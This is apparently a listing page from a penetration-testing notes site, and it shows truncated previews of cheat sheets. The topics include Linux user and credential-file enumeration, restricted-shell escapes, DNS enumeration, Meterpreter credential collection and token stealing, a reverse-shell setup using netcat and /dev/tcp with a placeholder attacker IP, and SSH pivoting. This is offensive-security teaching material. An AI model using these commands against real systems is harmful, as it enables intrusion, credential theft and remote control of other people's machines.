Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Users & Groups:
Command, followed by its result:

cat /etc/passwd
    List all users on the system
cat /etc/group
    List all groups on the system
for i in $(cat /etc/passwd 2>/dev/null | cut -d":" -f1 2>/dev/null); do id $i; done 2>/dev/null
    List all UIDs and their respective group memberships
cat /etc/shadow
    Show user hashes – Privileged comma...

Score: 1

Table of Contents
Blind Files
User accounts
Determine Distro
Installed Packages
Package Sources
Finding Important Files
Covering Your Tracks
Avoiding history files
Obtain users’ information
Looking for possible opened paths
Maintaining control
Reverse Shell
Fun if ...

Score: 1

Spawning shell/break restricted shell

python -c 'import pty; pty.spawn("/bin/sh")'

/bin/sh -i

echo os.system('/bin/bash')

(From within vi)

Add all binary paths if PATH variable is lacking

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Set up webserver

python -m ...

Score: 1

DNS Enumeration:
Command, followed by its result:

dig <domain_name>
    Perform a basic forward lookup
nslookup <domain_name>
    As above
host <domain_name>
    As above
dig @<server> <domain_name>
    Use a specific name server to perform the query
nslookup <domain_name> <server>
    As above
dig @<server> version.bind chaos tx...

Score: 1

John the Ripper is a favourite password cracking tool of many pentesters. There is plenty of documentation about its command line options.

I’ve encountered the following problems using John the Ripper. These are not problems with the tool itself, but inherent problems with pentesting and password cracking in general.

Sometimes I stumb...

Score: 1

<h2>Information Gathering</h2>
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets

<h2>Escalating Privs</h2>
ps then migrate

Tokens (use incognito)
list_tokens -u
steal_token ...

Score: 1

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.

If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port...

Score: 1

By: unknowndevice64 2019-05-18 20:31:16

Router Pentesting
Web Applications
Web Sites

Three different types of scenario
1. People purchase routers and do not change the interface's credentials
   Default username
   Default passwords

Score: 1

<h1>Reverse Shell Cheat Sheet</h1>
<i>Forked from: Published February 5, 2012 | By phillips321</i>

Step one – Set up your listener.
nc -l -v attackerip 4444

In all these examples the attacker IP will be

exec 5<>/dev/tcp/
cat <&5 | while read line; do $lin...

Score: 0

SSH has several features that are useful during pentesting and auditing. This page aims to remind us of the syntax for the most useful features.

NB: This page does not attempt to replace the man page for pentesters, only to supplement it with some pertinent examples.

Set up a SOCKS proxy on that lets you pivot thr...

Score: 0